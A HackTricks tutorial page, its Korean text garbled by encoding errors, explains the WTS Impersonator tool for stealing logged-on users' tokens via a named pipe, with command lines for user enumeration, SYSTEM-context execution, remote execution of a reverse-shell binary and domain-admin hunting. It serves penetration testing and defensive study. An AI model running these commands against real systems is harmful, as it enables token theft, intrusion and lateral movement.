Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

WTS Impersonator ๋„๊ตฌ๋Š” โ€œ\pipe\LSM_API_serviceโ€ RPC Named pipe๋ฅผ ์ด์šฉํ•˜์—ฌ ๋กœ๊ทธ์ธํ•œ ์‚ฌ์šฉ์ž๋ฅผ ์€๋ฐ€ํ•˜๊ฒŒ ์—ด๊ฑฐํ•˜๊ณ  ๊ทธ๋“ค์˜ ํ† ํฐ์„ ํƒˆ์ทจํ•˜์—ฌ ์ „ํ†ต์ ์ธ Token Impersonation ๊ธฐ๋ฒ•์„ ์šฐํšŒํ•ฉ๋‹ˆ๋‹ค. ์ด ์ ‘๊ทผ ๋ฐฉ์‹์€ ๋„คํŠธ์›Œํฌ ๋‚ด์—์„œ ์›ํ™œํ•œ ์ธก๋ฉด ์ด๋™์„ ์ด‰์ง„ํ•ฉ๋‹ˆ๋‹ค. ์ด ๊ธฐ์ˆ ์˜ ํ˜์‹ ์€ Omri Baso์—๊ฒŒ ๊ธฐ์ธํ•˜๋ฉฐ, ๊ทธ์˜ ์ž‘์—…์€ GitHub์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Core Functionality

์ด ๋„๊ตฌ๋Š” API ํ˜ธ์ถœ์˜ ์ผ๋ จ์„ ํ†ตํ•ด ์ž‘๋™ํ•ฉ๋‹ˆ๋‹ค:

WTSEnumerateSessionsA โ†’ WTSQuerySessionInformationA โ†’ WTSQueryUserToken โ†’ CreateProcessAsUserW

์ฃผ์š” ๋ชจ๋“ˆ ๋ฐ ์‚ฌ์šฉ๋ฒ•

  • ์‚ฌ์šฉ์ž ์—ด๊ฑฐ: ์ด ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋กœ์ปฌ ๋ฐ ์›๊ฒฉ ์‚ฌ์šฉ์ž ์—ด๊ฑฐ๊ฐ€ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ๊ฐ ์‹œ๋‚˜๋ฆฌ์˜ค์— ๋Œ€ํ•œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค:

  • ๋กœ์ปฌ์—์„œ:

.\WTSImpersonator.exe -m enum
  • ์›๊ฒฉ์œผ๋กœ, IP ์ฃผ์†Œ ๋˜๋Š” ํ˜ธ์ŠคํŠธ ์ด๋ฆ„์„ ์ง€์ •ํ•˜์—ฌ:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
  • ๋ช…๋ น ์‹คํ–‰: exec ๋ฐ exec-remote ๋ชจ๋“ˆ์€ ์ž‘๋™ํ•˜๊ธฐ ์œ„ํ•ด ์„œ๋น„์Šค ์ปจํ…์ŠคํŠธ๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. ๋กœ์ปฌ ์‹คํ–‰์€ WTSImpersonator ์‹คํ–‰ ํŒŒ์ผ๊ณผ ๋ช…๋ น๋งŒ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค:

  • ๋กœ์ปฌ ๋ช…๋ น ์‹คํ–‰ ์˜ˆ:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
  • PsExec64.exe๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์„œ๋น„์Šค ์ปจํ…์ŠคํŠธ๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:
.\PsExec64.exe -accepteula -s cmd.exe
  • ์›๊ฒฉ ๋ช…๋ น ์‹คํ–‰: PsExec.exe์™€ ์œ ์‚ฌํ•˜๊ฒŒ ์›๊ฒฉ์œผ๋กœ ์„œ๋น„์Šค๋ฅผ ์ƒ์„ฑํ•˜๊ณ  ์„ค์น˜ํ•˜์—ฌ ์ ์ ˆํ•œ ๊ถŒํ•œ์œผ๋กœ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค.

  • ์›๊ฒฉ ์‹คํ–‰ ์˜ˆ:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
  • ์‚ฌ์šฉ์ž ํ—ŒํŒ… ๋ชจ๋“ˆ: ์—ฌ๋Ÿฌ ์‹œ์Šคํ…œ์—์„œ ํŠน์ • ์‚ฌ์šฉ์ž๋ฅผ ๋Œ€์ƒ์œผ๋กœ ํ•˜์—ฌ ๊ทธ๋“ค์˜ ์ž๊ฒฉ ์ฆ๋ช…์œผ๋กœ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์—ฌ๋Ÿฌ ์‹œ์Šคํ…œ์—์„œ ๋กœ์ปฌ ๊ด€๋ฆฌ์ž ๊ถŒํ•œ์„ ๊ฐ€์ง„ ๋„๋ฉ”์ธ ๊ด€๋ฆฌ์ž๋ฅผ ํƒ€๊ฒŸํŒ…ํ•˜๋Š” ๋ฐ ํŠนํžˆ ์œ ์šฉํ•ฉ๋‹ˆ๋‹ค.
  • ์‚ฌ์šฉ ์˜ˆ:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ